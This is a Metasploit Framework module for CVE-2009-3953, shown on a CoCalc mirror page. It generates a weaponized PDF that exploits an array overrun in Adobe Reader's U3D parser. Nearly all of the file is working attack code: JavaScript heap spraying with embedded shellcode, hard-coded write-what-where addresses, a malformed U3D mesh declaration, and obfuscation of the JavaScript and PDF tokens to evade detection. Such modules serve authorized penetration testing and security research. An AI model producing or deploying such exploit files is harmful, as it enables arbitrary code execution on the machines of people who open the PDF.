CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'zlib'

7


8
class MetasploitModule < Msf::Exploit::Remote

9
  Rank = GoodRanking

10


11
  include Msf::Exploit::FILEFORMAT

12


13
  def initialize(info = {})

14
    super(update_info(info,

15
      'Name'           => 'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun',

16
      'Description'    => %q{

17
          This module exploits an array overflow in Adobe Reader and Adobe Acrobat.

18
          Affected versions include < 7.1.4, < 8.2, and < 9.3. By creating a

19
          specially crafted pdf that a contains malformed U3D data, an attacker may

20
          be able to execute arbitrary code.

21
      },

22
      'License'        => MSF_LICENSE,

23
      'Author'         =>

24
        [

25
          'Felipe Andres Manzano <felipe.andres.manzano[at]gmail.com>',

26
          'jduck'

27
        ],

28
      'References'     =>

29
        [

30
          [ 'CVE', '2009-3953' ],

31
          [ 'OSVDB', '61690' ],

32
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-02.html' ]

33
        ],

34
      'DefaultOptions' =>

35
        {

36
          'EXITFUNC' => 'process',

37
          'DisablePayloadHandler' => true

38
        },

39
      'Payload'        =>

40
        {

41
          'Space'         => 1024,

42
          'BadChars'      => "\x00",

43
          'DisableNops'	 => true

44
        },

45
      'Platform'       => 'win',

46
      'Targets'        =>

47
        [

48
          # test results (on Windows XP SP3)

49
          # reader 7.0.5 - untested

50
          # reader 7.0.8 - untested

51
          # reader 7.0.9 - untested

52
          # reader 7.1.0 - untested

53
          # reader 7.1.1 - untested

54
          # reader 8.0.0 - untested

55
          # reader 8.1.2 - works

56
          # reader 8.1.3 - not working :-/

57
          # reader 8.1.4 - untested

58
          # reader 8.1.5 - untested

59
          # reader 8.1.6 - untested

60
          # reader 9.0.0 - untested

61
          # reader 9.1.0 - works

62
          [ 'Adobe Reader Windows Universal (JS Heap Spray)',

63
            {

64
              'Size'		=> (6500/20),

65
              'DataAddr'	=> 0x09011020,

66
              'WriteAddr'	=> 0x7c49fb34,

67
            }

68
          ],

69
        ],

70
      'DisclosureDate' => '2009-10-13',

71
      'DefaultTarget'  => 0))

72


73
    register_options(

74
      [

75
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf']),

76
      ])

77


78
  end

79


80


81


82
  def exploit

83
    # Encode the shellcode.

84
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

85


86
    # Make some nops

87
    nops    = Rex::Text.to_unescape(make_nops(4))

88


89
=begin

90


91
Original notes on heap technique used in this exploit:

92


93
## PREPAREHOLES:

94
## We will construct 6500*20 bytes long chunks starting like this

95
## |0         |6   |8       |C        |24                    |size

96
## |00000...  |0100|20100190|0000...  |    ......pad......   |

97
##                 \      \

98
##                 \      \ -Pointer: to controlled data

99
##                   \ -Flag: must be 1

100
## -Adobe will handle this ragged structure if the Flag is on.

101
## -Adobe will get 'what to write where' from the memory pointed

102
##  by our supplied Pointer.

103
##

104
## then allocate a bunch of those ..

105
## .. | chunk | chunk | chunk | chunck | chunk | chunck | chunck | ..

106
##    |XXXXXXX|XXXXXXX|XXXXXXX|XXXXXXXX|XXXXXXX|XXXXXXXX|XXXXXXXX|

107
##

108
## and then free some of them...

109
## .. | chunk | free  | chunk |  free  | chunk |  free  | chunck | ..

110
##    |XXXXXXX|       |XXXXXXX|        |XXXXXXX|        |XXXXXXXX|

111
##

112
## This way controlling when the next 6500*20 malloc will be

113
## followed with. We freed more than one hole so it became tolerant

114
## to some degree of malloc/free trace noise.

115
## Note the 6500 is arbitrary it should be a fairly unused chunk size

116
## not big enough to cause a different type of allocation.

117
## Also as we don't need to reference it from anywhere we don't care

118
## where this hole layout is placed in memory.

119


120
## PREPAREMEMORY:

121
## In the next technique we make a big-chunk of 0x10000 bytes

122
## repeating a 0x1000 bytes long mini-chunk of controled data.

123
## Big-chunks are always allocated aligned to 0x1000. And if we

124
## allocate a fair amount of big-chuncks (XPSPx) we'll be confident

125
## Any 0x1000 aligned 0x1000 bytes from 0x09000000 to 0x0a000000

126
## will have our mini chunk

127
##

128
## A mini-chunk will have this look

129
##

130
## |0         |10          |54         |?           |0xff0  |0x1000

131
## |00000...  |  POINTERS  |    nops   | shellcode  |  pad  |

132
##

133
## So we control what is in 0x09XXXXXX. shellcode will be at 0x09XXX054+

134
## But we use 0x09011064.

135
## POINTERS looks like this:

136
## ...

137


138
=end

139


140
    # prepare the hole

141
    daddr = target['DataAddr']

142
    hole_data = [0,0,1,daddr].pack('VvvV')

143
    #padding

144
    hole_data << "\x00" * 24

145
    hole = Rex::Text.to_unescape(hole_data)

146


147
    # prepare ptrs

148
    ptrs_data = [0].pack('V')

149
    #where to write

150
    ptrs_data << [target['WriteAddr'] / 4].pack('V')

151
    #must be greater tan 5 and less than x for getting us where we want

152
    ptrs_data << [6].pack('V')

153
    #what to write

154
    ptrs_data << [(daddr+0x10)].pack('V')

155
    #autopointer for print magic(tm)

156
    ptrs_data << [(daddr+0x14)].pack('V')

157
    #function pointers for print magic(tm)

158
    #pointing to our shellcode

159
    ptrs_data << [(daddr+0x44)].pack('V') * 12

160
    ptrs = Rex::Text.to_unescape(ptrs_data)

161


162
    js_doc = <<-EOF

163
function prepareHoles(slide_size)

164
{

165
  var size = 1000;

166
  var xarr = new Array(size);

167
  var hole = unescape("#{hole}");

168
  var pad = unescape("%u5858");

169
  while (pad.length <= slide_size/2 - hole.length)

170
    pad += pad;

171
  for (loop1=0; loop1 < size; loop1+=1)

172
  {

173
    ident = ""+loop1;

174
    xarr[loop1]=hole + pad.substring(0,slide_size/2-hole.length);

175
  }

176
  for (loop2=0;loop2<100;loop2++)

177
  {

178
    for (loop1=size/2; loop1 < size-2; loop1+=2)

179
    {

180
      xarr[loop1]=null;

181
      xarr[loop1]=pad.substring(0,0x10000/2 )+"A";

182
      xarr[loop1]=null;

183
    }

184
  }

185
  return xarr;

186
}

187


188
function prepareMemory(size)

189
{

190
  var mini_slide_size = 0x1000;

191
  var slide_size = 0x100000;

192
  var xarr = new Array(size);

193
  var pad = unescape("%ucccc");

194


195
  while (pad.length <= 32 )

196
    pad += pad;

197


198
  var nops = unescape("#{nops}");

199
  while (nops.length <= mini_slide_size/2 - nops.length)

200
    nops += nops;

201


202
  var shellcode = unescape("#{shellcode}");

203
  var pointers = unescape("#{ptrs}");

204
  var chunk = nops.substring(0,32/2) + pointers +

205
    nops.substring(0,mini_slide_size/2-pointers.length - shellcode.length - 32) +

206
    shellcode + pad.substring(0,32/2);

207
  chunk=chunk.substring(0,mini_slide_size/2);

208
  while (chunk.length <= slide_size/2)

209
    chunk += chunk;

210


211
  for (loop1=0; loop1 < size; loop1+=1)

212
  {

213
    ident = ""+loop1;

214
    xarr[loop1]=chunk.substring(16,slide_size/2 -32-ident.length)+ident;

215
  }

216
  return xarr;

217
}

218


219
  var mem = prepareMemory(200);

220
  var holes = prepareHoles(6500);

221
  this.pageNum = 1;

222
EOF

223
    js_pg1 = %Q|this.print({bUI:true, bSilent:false, bShrinkToFit:false});|

224


225
    # Obfuscate it up a bit

226
    js_doc = obfuscate_js(js_doc,

227
      'Symbols' => {

228
        'Variables' => %W{ slide_size size hole pad mini_slide_size nops shellcode pointers chunk mem holes xarr loop1 loop2 ident },

229
        'Methods' => %W{ prepareMemory prepareHoles }

230
      }).to_s

231


232
    # create the u3d stuff

233
    u3d = make_u3d_stream(target['Size'], rand_text_alpha(rand(28)+4))

234


235
    # Create the pdf

236
    pdf = make_pdf(u3d, js_doc, js_pg1)

237


238
    print_status("Creating '#{datastore['FILENAME']}' file...")

239


240
    file_create(pdf)

241
  end

242


243


244
  def obfuscate_js(javascript, opts)

245
    js = Rex::Exploitation::ObfuscateJS.new(javascript, opts)

246
    js.obfuscate

247
    return js

248
  end

249


250


251
  def random_non_ascii_string(count)

252
    result = ""

253
    count.times do

254
      result << (rand(128) + 128).chr

255
    end

256
    result

257
  end

258


259
  def io_def(id)

260
    "%d 0 obj\n" % id

261
  end

262


263
  def io_ref(id)

264
    "%d 0 R" % id

265
  end

266


267
  #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/

268
  def n_obfu(str)

269


270
    result = ""

271
    str.scan(/./u) do |c|

272
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'

273
        result << "#%x" % c.unpack("C*")[0]

274
      else

275
        result << c

276
      end

277
    end

278
    result

279
  end

280


281
  def ascii_hex_whitespace_encode(str)

282
    result = ""

283
    whitespace = ""

284
    str.each_byte do |b|

285
      result << whitespace << "%02x" % b

286
      whitespace = " " * (rand(3) + 1)

287
    end

288
    result << ">"

289
  end

290


291
  def u3d_pad(str, char="\x00")

292
    ret = ""

293
    if (str.length % 4) > 0

294
      ret << char * (4 - (str.length % 4))

295
    end

296
    return ret

297
  end

298


299


300
  def make_u3d_stream(size, meshname)

301


302
    # build the U3D header

303
    hdr_data = [1,0].pack('n*') # version info

304
    hdr_data << [0,0x24,31337,0,0x6a].pack('VVVVV')

305
    hdr = "U3D\x00"

306
    hdr << [hdr_data.length,0].pack('VV')

307
    hdr << hdr_data

308


309
    # mesh declaration

310
    decl_data = [meshname.length].pack('v')

311
    decl_data << meshname

312
    decl_data << [0].pack('V') # chain idx

313
    # max mesh desc

314
    decl_data << [0].pack('V') # mesh attrs

315
    decl_data << [1].pack('V') # face count

316
    decl_data << [size].pack('V') # position count

317
    decl_data << [4].pack('V') # normal count

318
    decl_data << [0].pack('V') # diffuse color count

319
    decl_data << [0].pack('V') # specular color count

320
    decl_data << [0].pack('V') # texture coord count

321
    decl_data << [1].pack('V') # shading count

322
    # shading desc

323
    decl_data << [0].pack('V') # shading attr

324
    decl_data << [0].pack('V') # texture layer count

325
    decl_data << [0].pack('V') # texture coord dimensions

326
    # no textore coords (original shading ids)

327
    decl_data << [size+2].pack('V') # minimum resolution

328
    decl_data << [size+3].pack('V') # final maximum resolution (needs to be bigger than the minimum)

329
    # quality factors

330
    decl_data << [0x12c].pack('V') # position quality factor

331
    decl_data << [0x12c].pack('V') # normal quality factor

332
    decl_data << [0x12c].pack('V') # texture coord quality factor

333
    # inverse quantiziation

334
    decl_data << [0].pack('V') # position inverse quant

335
    decl_data << [0].pack('V') # normal inverse quant

336
    decl_data << [0].pack('V') # texture coord inverse quant

337
    decl_data << [0].pack('V') # diffuse color inverse quant

338
    decl_data << [0].pack('V') # specular color inverse quant

339
    # resource params

340
    decl_data << [0].pack('V') # normal crease param

341
    decl_data << [0].pack('V') # normal update param

342
    decl_data << [0].pack('V') # normal tolerance param

343
    # skeleton description

344
    decl_data << [0].pack('V') # bone count

345
    # padding

346
    decl_pad = u3d_pad(decl_data)

347
    mesh_decl = [0xffffff31,decl_data.length,0].pack('VVV')

348
    mesh_decl << decl_data

349
    mesh_decl << decl_pad

350


351
    # build the modifier chain

352
    chain_data = [meshname.length].pack('v')

353
    chain_data << meshname

354
    chain_data << [1].pack('V') # type (model resource)

355
    chain_data << [0].pack('V') # attributes (no bounding info)

356
    chain_data << u3d_pad(chain_data)

357
    chain_data << [1].pack('V') # number of modifiers

358
    chain_data << mesh_decl

359
    modifier_chain = [0xffffff14,chain_data.length,0].pack('VVV')

360
    modifier_chain << chain_data

361


362
    # mesh continuation

363
    cont_data = [meshname.length].pack('v')

364
    cont_data << meshname

365
    cont_data << [0].pack('V') # chain idx

366
    cont_data << [0].pack('V') # start resolution

367
    cont_data << [0].pack('V') # end resolution

368
    # no resolution update, unknown data follows

369
    cont_data << [0].pack('V')

370
    cont_data << [1].pack('V') * 10

371
    mesh_cont = [0xffffff3c,cont_data.length,0].pack('VVV')

372
    mesh_cont << cont_data

373
    mesh_cont << u3d_pad(cont_data)

374


375
    data = hdr

376
    data << modifier_chain

377
    data << mesh_cont

378


379
    # patch the length

380
    data[24,4] = [data.length].pack('V')

381


382
    return data

383


384
  end

385


386
  def make_pdf(u3d_stream, js_doc, js_pg1)

387


388
    xref = []

389
    eol = "\x0a"

390
    obj_end = "" << eol << "endobj" << eol

391


392
    # the header

393
    pdf = "%PDF-1.7" << eol

394


395
    # filename/comment

396
    pdf << "%" << random_non_ascii_string(4) << eol

397


398
    # js stream (doc open action js)

399
    xref << pdf.length

400
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js_doc))

401
    pdf << io_def(1) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol

402
    pdf << "stream" << eol

403
    pdf << compressed << eol

404
    pdf << "endstream" << eol

405
    pdf << obj_end

406


407
    # js stream 2 (page 1 annot js)

408
    xref << pdf.length

409
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js_pg1))

410
    pdf << io_def(2) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol

411
    pdf << "stream" << eol

412
    pdf << compressed << eol

413
    pdf << "endstream" << eol

414
    pdf << obj_end

415


416
    # catalog

417
    xref << pdf.length

418
    pdf << io_def(3) << n_obfu("<</Type/Catalog/Outlines ") << io_ref(4)

419
    pdf << n_obfu("/Pages ") << io_ref(5)

420
    pdf << n_obfu("/OpenAction ") << io_ref(8) << n_obfu(">>")

421
    pdf << obj_end

422


423
    # outline

424
    xref << pdf.length

425
    pdf << io_def(4) << n_obfu("<</Type/Outlines/Count 0>>")

426
    pdf << obj_end

427


428
    # pages/kids

429
    xref << pdf.length

430
    pdf << io_def(5) << n_obfu("<</Type/Pages/Count 2/Kids [")

431
    pdf << io_ref(10) << " " # empty page

432
    pdf << io_ref(11) # u3d page

433
    pdf << n_obfu("]>>")

434
    pdf << obj_end

435


436
    # u3d stream

437
    xref << pdf.length

438
    pdf << io_def(6) << n_obfu("<</Type/3D/Subtype/U3D/Length %s>>" % u3d_stream.length) << eol

439
    pdf << "stream" << eol

440
    pdf << u3d_stream << eol

441
    pdf << "endstream"

442
    pdf << obj_end

443


444
    # u3d annotation object

445
    xref << pdf.length

446
    pdf << io_def(7) << n_obfu("<</Type/Annot/Subtype")

447
    pdf << "/3D/3DA <</A/PO/DIS/I>>"

448
    pdf << n_obfu("/Rect [0 0 640 480]/3DD ") << io_ref(6) << n_obfu("/F 7>>")

449
    pdf << obj_end

450


451
    # js dict (open action js)

452
    xref << pdf.length

453
    pdf << io_def(8) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(1) + ">>" << obj_end

454


455
    # js dict (page 1 annot js)

456
    xref << pdf.length

457
    pdf << io_def(9) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(2) + ">>" << obj_end

458


459
    # page 0 (empty)

460
    xref << pdf.length

461
    pdf << io_def(10) << n_obfu("<</Type/Page/Parent ") << io_ref(5) << n_obfu("/MediaBox [0 0 640 480]")

462
    pdf << n_obfu(" >>")

463
    pdf << obj_end

464


465
    # page 1 (u3d/print)

466
    xref << pdf.length

467
    pdf << io_def(11) << n_obfu("<</Type/Page/Parent ") << io_ref(5) << n_obfu("/MediaBox [0 0 640 480]")

468
    pdf << n_obfu("/Annots [") << io_ref(7) << n_obfu("]")

469
    pdf << n_obfu("/AA << /O ") << io_ref(9) << n_obfu(">>")

470
    pdf << n_obfu(">>")

471
    pdf << obj_end

472


473
    # xrefs

474
    xrefPosition = pdf.length

475
    pdf << "xref" << eol

476
    pdf << "0 %d" % (xref.length + 1) << eol

477
    pdf << "0000000000 65535 f" << eol

478
    xref.each do |index|

479
      pdf << "%010d 00000 n" % index << eol

480
    end

481


482
    # trailer

483
    pdf << "trailer" << eol

484
    pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(3) << ">>" << eol

485
    pdf << "startxref" << eol

486
    pdf << xrefPosition.to_s() << eol

487
    pdf << "%%EOF" << eol

488


489
  end

490
end

491


492